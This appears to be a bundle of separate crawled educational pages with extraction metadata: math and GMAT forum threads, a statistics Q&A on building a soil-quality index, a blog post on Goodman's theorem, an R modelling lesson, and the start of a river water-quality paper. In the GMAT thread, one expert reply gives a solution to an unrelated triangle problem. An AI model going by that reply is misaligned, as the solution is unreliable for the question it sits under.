{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 18, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5381259322166443, "perplexity": 5546.71732791458}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-45/segments/1603107894426.63/warc/CC-MAIN-20201027170516-20201027200516-00328.warc.gz"}
http://mathhelpforum.com/trigonometry/173459-trig-transformation-graph-easy.html
# Thread: Trig transformation graph - Easy 1. ## Trig transformation graph - Easy I forgot how to do this. 6 cos(4x). 6 sin(8x) i know the amplitude is 6. I'm having trouble finding the period. Can someone tell me how to find what the period is? 2. The period of $\sin(ax)$ is $\dfrac{2\pi}{a}$. Same applies for $\cos(ax)$
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 3, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9854238033294678, "perplexity": 1409.848074145412}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172050.87/warc/CC-MAIN-20170219104612-00438-ip-10-171-10-108.ec2.internal.warc.gz"}
http://gmatclub.com/forum/the-figure-above-shows-a-circular-flower-bed-with-its-cente-144448.html
The figure above shows a circular flower bed, with its cente : GMAT Problem Solving (PS) Check GMAT Club Decision Tracker for the Latest School Decision Releases http://gmatclub.com/AppTrack It is currently 19 Jan 2017, 19:50 ### GMAT Club Daily Prep #### Thank you for using the timer - this advanced tool can estimate your performance and suggest more practice questions. We have subscribed you to Daily Prep Questions via email. Customized for You we will pick new questions that match your level based on your Timer History Track every week, we’ll send you an estimated GMAT score based on your performance Practice Pays we will pick new questions that match your level based on your Timer History # Events & Promotions ###### Events & Promotions in June Open Detailed Calendar # The figure above shows a circular flower bed, with its cente new topic post reply Question banks Downloads My Bookmarks Reviews Important topics Author Message TAGS: ### Hide Tags Manager Joined: 02 Dec 2012 Posts: 178 Followers: 5 Kudos [?]: 2325 [1] , given: 0 The figure above shows a circular flower bed, with its cente [#permalink] ### Show Tags 20 Dec 2012, 05:43 1 KUDOS 00:00 Difficulty: 5% (low) Question Stats: 91% (01:43) correct 9% (00:43) wrong based on 696 sessions ### HideShow timer Statistics Attachment: Circle.png [ 12.22 KiB | Viewed 9185 times ] The figure above shows a circular flower bed, with its center at O, surrounded by a circular path that is 3 feet wide. What is the area of the path, in square feet? (A) $$25\pi$$ (B) $$38\pi$$ (C) $$55\pi$$ (D) $$57\pi$$ (E) $$64\pi$$ [Reveal] Spoiler: OA Math Expert Joined: 02 Sep 2009 Posts: 36567 Followers: 7081 Kudos [?]: 93218 [1] , given: 10553 Re: The figure above shows a circular flower bed, with its cente [#permalink] ### Show Tags 20 Dec 2012, 05:48 1 KUDOS Expert's post The figure above shows a circular flower bed, with its center at O, surrounded by a circular path that is 3 feet wide. What is the area of the path, in square feet? (A) $$25\pi$$ (B) $$38\pi$$ (C) $$55\pi$$ (D) $$57\pi$$ (E) $$64\pi$$ The radius of the bigger circle is 8 + 3 = 11 feet, thus its area is $$\pi{r^2}=121\pi$$. The area of the smaller circle is $$\pi{8^2}=64\pi$$. The difference is $$121\pi-64\pi=57\pi$$. _________________ GMAT Club Legend Joined: 09 Sep 2013 Posts: 13459 Followers: 575 Kudos [?]: 163 [0], given: 0 Re: The figure above shows a circular flower bed, with its cente [#permalink] ### Show Tags 19 Jan 2015, 16:32 Hello from the GMAT Club BumpBot! Thanks to another GMAT Club member, I have just discovered this valuable topic, yet it had no discussion for over a year. I am now bumping it up - doing my job. I think you may find it valuable (esp those replies with Kudos). Want to see all other topics I dig out? Follow me (click follow button on profile). You will receive a summary of all topics I bump in your profile area as well as via email. _________________ Director Joined: 24 Nov 2015 Posts: 564 Location: United States (LA) Concentration: General Management, Marketing GMAT 1: 700 Q49 V36 GRE 1: 328 Q167 V161 Followers: 11 Kudos [?]: 25 [0], given: 222 The figure above shows a circular flower bed, with its cente [#permalink] ### Show Tags 26 Apr 2016, 14:15 $$Radius of total garden$$ = 8 + 3 = 11 $$feet$$ $$Area of flower bed including path$$ = $$\pi$$$$11^2$$ $$Area of flower bed$$ = $$\pi$$ $$8^2$$ $$Area of only path$$ = 57$$\pi$$ sq.feet $$correct answer$$ - D Senior Manager Status: Head GMAT Instructor Affiliations: Target Test Prep Joined: 04 Mar 2011 Posts: 464 Followers: 22 Kudos [?]: 193 [0], given: 2 Re: The figure above shows a circular flower bed, with its cente [#permalink] ### Show Tags 27 Apr 2016, 07:44 Attachment: Circle.png The figure above shows a circular flower bed, with its center at O, surrounded by a circular path that is 3 feet wide. What is the area of the path, in square feet? (A) $$25\pi$$ (B) $$38\pi$$ (C) $$55\pi$$ (D) $$57\pi$$ (E) $$64\pi$$ In solving this problem we first must recognize that the flower bed is the right triangle with sides of y yards, x yards, and z yards. We are given that the area of the bed (which is the right triangle) is 24 square yards. Since we know that area of a triangle is ½ Base x Height, we can say: 24 = ½(xy) 48 = xy We also know that x = y + 2, so substituting in y + 2 for x in the area equation we have: 48 = (y+2)y 48 = y^2 + 2y y^2 + 2y – 48 = 0 (y + 8)(y – 6) = 0 y = -8 or y = 6 Since we cannot have a negative length, y = 6. We can use the value for y to calculate the value of x. x = y + 2 x = 6 + 2 x = 8 We can see that 6 and 8 represent two legs of the right triangle, and now we need to determine the length of z, which is the hypotenuse. Knowing that the length of one leg is 6 and the other leg is 8, we know that we have a 6-8-10 right triangle. Thus, the length of z is 10 yards. If you didn't recognize that 6, 8, and 10 are the sides and hypotenuse of a right triangle, you would have to use the Pythagorean to find the length of the hypotenuse: 6^2 + 8^2 = c^2 → 36 + 64 = c^2 → 100 = c^2. The positive square root of 100 is 10, and thus the value of z is 10. _________________ Jeffrey Miller Jeffrey Miller Head of GMAT Instruction Manager Joined: 20 Oct 2015 Posts: 51 Followers: 0 Kudos [?]: 1 [0], given: 8 Re: The figure above shows a circular flower bed, with its cente [#permalink] ### Show Tags 05 Jul 2016, 05:16 Attachment: Circle.png The figure above shows a circular flower bed, with its center at O, surrounded by a circular path that is 3 feet wide. What is the area of the path, in square feet? (A) $$25\pi$$ (B) $$38\pi$$ (C) $$55\pi$$ (D) $$57\pi$$ (E) $$64\pi$$ 8+3=11 11^2=121 8^2= 64 121pi -64 pi= 57 pi Re: The figure above shows a circular flower bed, with its cente   [#permalink] 05 Jul 2016, 05:16 Similar topics Replies Last post Similar Topics: 7 In the figure above, what is the measure of ∠ BED? 3 29 Dec 2015, 06:44 In the figure above, a circular hoop is rolling along a flat 4 17 Sep 2013, 00:09 4 The figure above shows the shape and dimensions of the 3 21 Mar 2012, 13:57 3 The figure shows the top side of a circular medallion made 6 25 Jan 2008, 03:17 12 The figure above shows the dimensions of a semicircular 12 08 Jan 2008, 05:10 Display posts from previous: Sort by # The figure above shows a circular flower bed, with its cente new topic post reply Question banks Downloads My Bookmarks Reviews Important topics Powered by phpBB © phpBB Group and phpBB SEO Kindly note that the GMAT® test is a registered trademark of the Graduate Management Admission Council®, and this site has neither been reviewed nor endorsed by GMAC®.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5984114408493042, "perplexity": 2278.1573300993555}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00334-ip-10-171-10-70.ec2.internal.warc.gz"}
https://stats.stackexchange.com/questions/9358/creating-an-index-of-quality-from-multiple-variables-to-enable-rank-ordering?noredirect=1
# Creating an index of quality from multiple variables to enable rank ordering I have four numeric variables. All of them are measures of soil quality. Higher the variable, higher the quality. The range for all of them is different: Var1 from 1 to 10 Var2 from 1000 to 2000 Var3 from 150 to 300 Var4 from 0 to 5 I need to combine four variables into single soil quality score which will successfully rank order. My idea is very simple. Standardize all four variables, sum them up and whatever you get is the score which should rank-order. Do you see any problem with applying this approach. Is there any other (better) approach that you would recommend? Thanks Edit: Thanks guys. A lot of discussion went into "domain expertise"... Agriculture stuff... Whereas I expected more stats-talk. In terms of technique that I will be using... It will probably be simple z-score summation + logistic regression as an experiment. Because vast majority of samples has poor quality 90% I'm going to combine 3 quality categories into one and basically have binary problem (somequality vs no-quality). I kill two birds with one stone. I increase my sample in terms of event rate and I make a use of experts by getting them to clasify my samples. Expert classified samples will then be used to fit log-reg model to maximize level of concordance / discordance with the experts.... How does that sound to you? The proposed approach may give a reasonable result, but only by accident. At this distance--that is, taking the question at face value, with the meanings of the variables disguised--some problems are apparent: 1. It is not even evident that each variable is positively related to "quality." For example, what if a 10 for 'Var1' means the "quality" is worse than the quality when Var1 is 1? Then adding it to the sum is about as wrong a thing as one can do; it needs to be subtracted. 2. Standardization implies that "quality" depends on the data set itself. Thus the definition will change with different data sets or with additions and deletions to these data. This can make the "quality" into an arbitrary, transient, non-objective construct and preclude comparisons between datasets. 3. There is no definition of "quality". What is it supposed to mean? Ability to block migration of contaminated water? Ability to support organic processes? Ability to promote certain chemical reactions? Soils good for one of these purposes may be especially poor for others. 4. The problem as stated has no purpose: why does "quality" need to be ranked? What will the ranking be used for--input to more analysis, selecting the "best" soil, deciding a scientific hypothesis, developing a theory, promoting a product? 5. The consequences of the ranking are not apparent. If the ranking is incorrect or inferior, what will happen? Will the world be hungrier, the environment more contaminated, scientists more misled, gardeners more disappointed? 6. Why should a linear combination of variables be appropriate? Why shouldn't they be multiplied or exponentiated or combined as a posynomial or something even more esoteric? 7. Raw soil quality measures are commonly re-expressed. For example, log permeability is usually more useful than the permeability itself and log hydrogen ion activity (pH) is much more useful than the activity. What are the appropriate re-expressions of the variables for determining "quality"? One would hope that soils science would answer most of these questions and indicate what the appropriate combination of the variables might be for any objective sense of "quality." If not, then you face a multi-attribute valuation problem. The Wikipedia article lists dozens of methods for addressing this. IMHO, most of them are inappropriate for addressing a scientific question. One of the few with a solid theory and potential applicability to empirical matters is Keeney & Raiffa's multiple attribute valuation theory (MAVT). It requires you to be able to determine, for any two specific combinations of the variables, which of the two should rank higher. A structured sequence of such comparisons reveals (a) appropriate ways to re-express the values; (b) whether or not a linear combination of the re-expressed values will produce the correct ranking; and (c) if a linear combination is possible, it will let you compute the coefficients. In short, MAVT provides algorithms for solving your problem provided you already know how to compare specific cases. • RE: 1. I know for sure that "higher the number, higher the quality" for all four variables RE: 2. Good point. What can I do to make two datasets comparable – user333 Apr 8 '11 at 16:02 • @user My recommendations are in the last paragraph: preferably, find a quantitative expression of "quality" in the scientific literature. Barring that, apply MAVT. Both produce a fixed formula independent of the dataset. That assures comparability. – whuber Apr 8 '11 at 16:06 • @whuber, Couldn't one view this as a problem of making a formative measure based on the available information, in which case summing the Z-scores is not as bad as you make it sound? – Andy W Apr 8 '11 at 17:38 • @Andy Could you explain what you mean by "formative measure" and "available information"? // I should point out that many measures of soil suitability for agriculture are not even monotonic, much less linear: for instance, a plant might flourish within a range of pH but suffer with pH's beyond this range in either direction. It would be a special circumstance indeed--maybe one involving a narrow range of values--if a simple linear combination of soil characteristics had any objective relationship to agricultural qualities. – whuber Apr 8 '11 at 17:52 • @Andy Assuming "quality" is a numeric value to be used for ranking soil samples, then definitely the problem is one of discrete decisions: given a pair of attributes $(y_1, \ldots, y_k)$ and $(x_1, \ldots, x_k)$, which has better quality? You are correct that you need to know something about what quality is in order to create the desired combination of the attributes. The approach I have taken supposes you do not have an independent assessment of quality (that would put us into a regression or response surface modeling situation), but you can make these comparisons with reasonable accuracy. – whuber Apr 8 '11 at 19:09 Anyone looked at Russell G. Congalton 'Review of Assessing the Accuracy of Classifications of Remotely Sensed Data' 1990 ?. It describes a technique known as error matrix for varing matrices, also a term he uses called ' Normalizing data' , whereby one gets all the different vectors and 'normalizes' or sets them to equal from 0 to 1. You basically change all vectors to equal ranges from 0 to 1. One other thing you did not discuss is the scale of the measurements. V1 and V5 looks like they are of rank order and the other seem not. So standardization may be skewing the score. So you may be better transforming all of the variables into ranks, and determining a weighting for each variable, since it is highly unlikely that they have the same weight. Equal weighting is more of a "no nothing" default. You might want to do some correlation or regression analysis to come up with some a priori weights. • How can I use correlation analysis to determine weigh? – user333 Apr 8 '11 at 16:36 • If you already have a pre-existing overall measure of quality, e.g expert opinions, (or are willing to accept other variables as a proxy for this), you could choose the highest correlated variables and give it the highest weighting. – Ralph Winters Apr 8 '11 at 17:07 I had a similar problem recently and though I add my approach to the nice answers. I think in order to find a simple way to determine which variable leads to the best ranking. One could transform your problem to a gridsearch approach: Basically use a combined score for the ranking which is composed as such: Finel_score = Var1 * A + Var2 * B + Var3 * C .... Then you can compute the final score with different values for A,B,C (sklearn gridsearch could be used) ... and compare the resulting ranking to an expected ranking (some ground truth is needed to determine the goodness of you ranking). The best parameters result in the weights of your individual variables. Following up on Ralph Winters' answer, you might use PCA (principal component analysis) on the matrix of suitably standardized scores. This will give you a "natural" weight vector that you can use to combine future scores. Do this also after all scores have been transformed into ranks. If the results are very similar, you have good reasons to continue with either method. If there are discrepancies, this will lead to interesting questions and a better understanding. • I disagree. While one would likely be interested in the inter-item correlations for curiosity, all of the variables could be orthogonal yet still contribute to quality. For a silly example the soil in Antarctica may have optimal nitrogen content, but I doubt it would suffice as a suitable climate. – Andy W Apr 8 '11 at 18:45 • @Andy W: In that case, all the variables should be weighted equally, and PCA will tell you that. It would also tell you that the leading component only accounts for a relatively small fraction of the overall variability in the scores matrix. – Hans Engler Apr 8 '11 at 20:52 • I still disagree. It does not tell you if the scores should be weighted equally. Two items could have a positive correlation yet each has opposite relationships to "quality". The inter-item correlations do not necessarily say anything about the unobserved measure in the given context. If quality were a latent variable and the variables were "reflective" of that latent construct that may be true, but that is not the case in this given example. – Andy W Apr 9 '11 at 3:48 • @Andy, I agree with your point if nothing were known about the association of the observed variables with "quality". But the OP wrote "All of [the variables] are measures of soil quality. Higher the variable, higher the quality" implying a positive association throughout. To be more precise: Let $A$ be the $m \times n$ matrix of observations. Consider the first term $\sigma_1 uv^T$ in the singular value decomposition of $A$. If all $n$ variables have the same association with "quality", one expects all $v_j$ to have the same sign. In that case, use multiples of these $v_j$ as weights. – Hans Engler Apr 9 '11 at 21:56 • I still disagree. Even if the association is expected to be in the same direction this does not mean the indicators should be inherently given any weight based on their inter-item correlation. The shared variance can only say something about the relationship between the indicators. Think of a regression model in which we predict a known measure of quality from these indicators. The inter-item correlations between the indicators do not tell you what the expected slopes will be. – Andy W Apr 10 '11 at 12:38
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5986588597297668, "perplexity": 957.3520749912898}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623488517820.68/warc/CC-MAIN-20210622124548-20210622154548-00288.warc.gz"}
http://paulooliva.blogspot.com/2013/03/goodmans-theorem.html?showComment=1366234997744
## Monday, 4 March 2013 ### Goodman's theorem Let HA denote Heyting (intuitionistic) arithmetic and HA$$^\omega$$ be Heyting arithmetic extended to the language of finite types, i.e. with quantifiers for each finite type. AC stands for the axiom of choice. Finally, recall that a formula is arithmetical if it only contains quantifications over numbers. In [1,2] Goodman proved the following amazing result: Theorem. If HA$$^\omega$$ + AC proves an arithmetical formula $$A$$ then HA already proves $$A$$. In proof theory one would simply say that HA$$^\omega$$ + AC is conservative over HA. The fact that HA$$^\omega$$ is conservative over HA was already known and is easy to show. But the conservation of HA$$^\omega$$ + AC over HA is quite a surprising result. Recall that adding the axiom of choice to classical mathematics leads to all sorts of strange things (e.g. the Banach-Tarski paradox). Goodman's theorem essentially says that this is not the fault of the axiom of choice, but rather a fault of the combination of the axiom of choice with classical logic. Classical logic on its own makes perfect sense. The axiom of choice in an intuitionistic setting is harmless. But when these two are put together all hell breaks loose. Proof of Goodman's theorem. Goodman's proof involves two major proof-theoretic techniques: forcing and realizability. Realizability is used to eliminate the axiom of choice, since the axiom of choice has a trivial realizer. But then one ends up with a proof of "$$t$$ realizes $$A$$". Forcing is used to recover the truth of $$A$$ given that $$A$$ has a realizer. That is done by choosing the forcing conditions to be approximations of the Skolem functions of the sub-formulas of $$A$$. So, the axiom of choice is replaced by finite approximations of Skolem functions! Let's see a few of the details: We present here a sketch of Beeson's proof [3] of Goodman's theorem. Beeson's proof has the advantage (over Goodman's proof) that the two techniques of forcing and realizability are clearly separated. The proof consists of the following steps: (1) Let $$A$$ be an arithmetical formula such that HA$$^\omega$$ + AC $$\vdash A$$. (2) Let HA$$^\omega_a$$ denote the extension of HA$$^\omega$$ with a new function symbol $$a$$. By the soundness of Kleene realizability relative to $$a$$ we have HA$$^\omega_a \vdash t$$ realizes $$A$$, where $$t$$ is a term of HA$$^\omega_a$$. (3) By the soundness of the forcing interpretation we have HA$$^\omega \vdash \exists p (p \Vdash t$$ realizes $$A)$$, where the forcing conditions are chosen as in the main lemma (below). Forcing is done as usual, with the crucial difference that in the forcing of the atomic formulas the forcing condition $$p$$ replaces the "generic" function $$a$$, i.e. $$p \Vdash a(n) = m$$ is defined as $$p(n) = m$$, where I'm actually using the equality symbol "=" for partial equality. (4) By the main lemma HA$$^\omega \vdash \forall p \exists q \leq p (q \Vdash (t$$ realizes $$A) \Rightarrow A)$$. (5) By (3) and (4) we have HA$$^\omega \vdash \exists q (q \Vdash A)$$. (6) As for arithmetical formula HA$$^\omega \vdash (q \Vdash A) \Leftrightarrow A$$ we have, HA$$^\omega \vdash A$$. Steps (2) and (3) are pretty standard realizability and forcing interpretations. And only the soundness theorems of these are used. Step (6) is also easy to check by a simple induction on $$A$$. So, the crucial bit of the proof is the choice of the forcing conditions and the main lemma which we discuss next. Main lemma. Fix an arithmetical sentence $$A$$. Then there is a set $$C$$ of forcing conditions such that $$\mbox{HA}^\omega \vdash \forall p \exists q \leq p (q \Vdash (t \mbox{ realizes } A) \Rightarrow A).$$ Proof of main lemma. The set of forcing conditions $$C$$ consists of finite functions $$p$$ which are approximations to the Skolem functions of all sub-formulas of $$A$$. More precisely, these are partial functions $$p$$ with finite domain such that for each sub-formula $$B(x, y)$$ of $$A$$ we have $$\exists x B(x, y) \wedge (p_{\exists x B(x, y)}(y) \mbox{ defined }) \Rightarrow B(p_{\exists x B(x, y)}(y), y).$$ Hence, whenever the approximation to the Skolem function $$p_{\exists x B(x, y)}$$ is defined then it produces the right witness. Relative to these (approximation of) Skolem functions, it's easy to show the following: (i) HA$$^\omega \vdash \forall p \exists q \leq p (q \Vdash (B(y) \Rightarrow \{j_B\}(y) \mbox{ realizes } B ))$$, for some index $$j_B$$ which we can construct (using the Skolem functions). (ii) HA$$^\omega \vdash \forall p \exists q \leq p (q \Vdash (t \mbox{ realizes } B ) \Rightarrow B)$$. Remark. Ulrich Kohlenbach [4] has shown the interesting fact that Goodman's theorem does not hold for fragments of HA$$^\omega$$. This means that in order to eliminate AC from the proof of an arithmetical formula $$A$$ we might have to use a more complex induction than in the proof which is allowed to use AC. Thierry Coquand [5] has just published another proof of Goodman's theorem. [1] Goodman, N., The theory of the Gödel functionals, Journal of Symbolic Logic 41, 574-583 (1976) [2] Goodman, N. Relativized realizability in intuitionistic arithmetic of all finite types. Journal of Symbolic Logic 43, pp. 23-44 (1978) [3] Beeson, M., Goodman's theorem and beyond. Pacific J. Math. 84, 1-16 (1979) [4] Kohlenbach, U., A note on Goodman's theorem. Studia Logica 63, 1-5 (1999) [5] Coquand, T., About Goodman's theorem. Annals of Pure and Applied Logic 164(4), 437-442 (2013)
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 2, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9853195548057556, "perplexity": 499.37556449054256}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-30/segments/1531676590866.65/warc/CC-MAIN-20180719105750-20180719125750-00131.warc.gz"}
http://coursekata.org/preview/version/0ea12f05-dce8-4b7c-a6ad-5950ec4a57bb/lesson/10/2
list # Statistics and Data Science: A Modeling Approach ## 7.2 Fitting a Model With an Explanatory Variable Now that you have learned how to specify a model with an explanatory variable, let’s learn how to fit the model using R. Fitting a model, as a reminder, simply means calculating the parameter estimates. We use the word “fitting” because we want to calculate the best estimate, the one that will result in the least amount of error. For the tiny data set, we could calculate the parameter estimates in our head—it’s just a matter of calculating the mean for males and the mean for females. But when the data set is larger, it is much easier to use R. Using R, we will first fit the Sex model to the tiny data set, just so you can see that R gives you the same parameter estimates you got before. After that we will fit it to the complete data set. Note that the parts that are going to be different for each person ($$X_{i}$$ and $$Y_{i}$$) are called variables (because they vary)! $$e_i$$ also varies, but we typically reserve the label “variable” for outcome and explanatory variables. The parts that are going to be the same for each person ($$b_{0}$$ and $$b_{1}$$) are called parameter estimates. We do not need to estimate the variables. Each student in the data set already has a score for the outcome variable ($$Y_{i}$$) and the explanatory variable ($$X_{i}$$), and these scores vary across students. Notice that the subscript $$i$$ is attached to the parts that are different for each person. We do need to estimate the parameters because, as discussed previously, they are features of the population, and thus are unknown. The parameter estimates we calculate are those that best fit our particular sample of data. But we would have gotten different estimates if we had a different sample. Thus, it is important to keep in mind that these estimates are only that, and they are undoubtedly wrong. Calling them estimates keeps us humble! Parameter estimates don’t vary from person to person, so they don’t carry the subscript $$i$$. ### Fitting the Sex Model to the Tiny Data Set We will refer to this more complex model (more complex than the empty model, that is) as the Sex model. It has one explanatory variable, Sex. We will fit the model using R’s lm() (linear model) function. To fit the model we run this R code, and get the results below: lm(Thumb ~ Sex, data=TinyFingers) Call: lm(formula = Thumb ~ Sex, data = TinyFingers) Coefficients: (Intercept) Sexmale 59 6 Note that the estimates are exactly what you should have expected: the first estimate, for $$b_{0},$$ is 59 (the mean for females); the second, $$b_{1}$$ is 6, which is the number of millimeters you need to add to the female average thumb length to get average male thumb length. Notice that the estimate for $$b_{0}$$ is labeled “intercept” in the output. You have encountered the concept of intercept before, when you studied the concept of a line in algebra. Remember the equation for a line? $$y=mx+b$$. $$m$$ represents the slope of the line, and $$b$$, the y-intercept. The General Linear Model notation is similar to this, though it includes error, whereas the equation for a line does not. The reason the estimate for $$b_{0}$$ is called Intercept is because it is the estimate for thumb length when $$X_{i}$$ is equal to 0—in other words, when sex is female. The estimate that R called “Sexmale,” by this line of reasoning, is kind of like the slope of a line. It is the increment in thumb length for a unit increase in $$X_{i}$$. If you want—and it’s a good idea—you can save the results of this model fit in an R object. Here’s the code to save the model fit in an object called TinySex.model: TinySex.model <- lm(Thumb ~ Sex, data=TinyFingers) Once you’ve saved the model, If you want to see what the model estimates are, you can just type the name of the model and you will get the same output as above: TinySex.model Call: lm(formula = Thumb ~ Sex, data = TinyFingers) Coefficients: (Intercept) Sexmale 59 6 Now that we have estimates for the two parameters, we can put them in our model statement to yield: $$Y_{i} = 59 + 6 X_{i}+e_{i}$$. ### Fitting the Sex Model to the Complete Data Set Now that you have looked in detail at the tiny set of data, find the best estimates for our bigger set of data (found in the data frame called Fingers) by modifying the code below. require(tidyverse) require(mosaic) require(Lock5Data) require(supernova) # store the model where Sex predicts Thumb Sex.model <- # this prints out the model estimates Sex.model Sex.model <- lm(Thumb ~ Sex, data = Fingers) Sex.model ex() %>% check_object("Sex.model") %>% check_equal() Use lm() to create a model of Sex from the Fingers data frame DataCamp: ch7-1 Call: lm(formula = Thumb ~ Sex, data = Fingers) Coefficients: (Intercept) Sexmale 58.256 6.447
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7234451174736023, "perplexity": 641.0218950907771}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610703513062.16/warc/CC-MAIN-20210117143625-20210117173625-00556.warc.gz"}
https://www.eeer.org/journal/view.php?number=1143
Environ Eng Res > Volume 26(1); 2021 > Article Mishra and Kumar: Estimation of physicochemical characteristics and associated metal contamination risk in river Narmada, India ### Abstract River Narmada is the fifth largest holy river of Madhya Pradesh (M.P) flowing in the central part of India. The river receives large quantity of untreated/partially treated wastewater enriched with heavy metals and supplementary toxic organic pollutants. This study aims to assess the water quality status in river Narmada using indices like comprehensive pollution index (CPI), heavy metal pollution index (HPI), risk assessment index (RAI) and cancer risk index (CRI), for human use. The presence of faecal coliform and high chemical oxygen demand > 20 mg/L indicates that the water is unsuitable for drinking purposes. The average CPI and HPI evaluated to be 1.98, and 1.35, respectively signifies the moderately polluted river water. Considerably, the RAI > 1 and CRI > 1 is obtained at all sampling locations that alarms the possible cancer risk to human if untreated river water is used. Principal component analysis of data confirmed pollution in the river from both natural and anthropogenic sources. The strongest Pearson correlation coefficient between Cu-Pb (0.998) and Zn-Cu (0.986) indicates the input of wastewater in the river probably from electroplating industries. The river water is unsuitable for human intake. It is required to control direct flow of wastewater in river to restore ecological health. ### 1. Introduction Considerably, in most of the reported studies [15], the WQ status of river Narmada has been classified on the basis of the comparative judgment of individual WQ parameters to their standards defined in regional and international scale. But, these studies do not provide a complete picture or scenario of overall river water pollution or ecological health of a river. Moreover, a comprehensive study of WQ in the river Narmada involving assessment of heavy metals and other physicochemical parameters with biological characteristics that address the biotic risk is yet to be investigated. In the present study, physicochemical parameters (like DO, BOD, COD and others), heavy metals (like As, Cu, Cd and others) concentration and bacteriological characteristics of water in river Narmada along the stretch in state Madhya Pradesh (M.P), India has been carried out extensively. It was focused to classify the suitability of river water for human use and identify the major pollutants present in the river. Globally, several water quality indices (WQI) have been developed for monitoring the surface WQ of freshwater bodies with respect to human use [16, 17]. WQI is a concise and comprehensive method that expresses the river WQ or pollution 